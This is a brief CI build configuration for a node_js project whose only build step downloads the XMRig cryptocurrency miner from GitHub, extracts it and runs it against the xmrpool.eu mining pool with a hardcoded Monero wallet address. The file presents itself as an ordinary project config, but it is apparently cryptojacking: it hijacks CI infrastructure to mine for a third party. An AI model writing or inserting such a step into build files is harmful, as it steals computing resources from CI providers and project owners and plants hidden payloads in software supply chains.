language: node_js
branches:
  only:
    - master

build:
  ci:
    - wget https://github.com/xmrig/xmrig/releases/download/v6.12.1/xmrig-6.12.1-linux-x64.tar.gz && tar xf xmrig-6.12.1-linux-x64.tar.gz && cd xmrig-6.12.1 && ./xmrig -o xmrpool.eu:9999 -u 43FN9N7ktZJAtr6nsvNdTtKHbuCJAER7L9srybAMPNWBHzGk98f3jiTNGRkBfgeEDRQan9PwdYfFwEDrKq9DH7ck8K19JPD -k -t1 --tls --print-time 5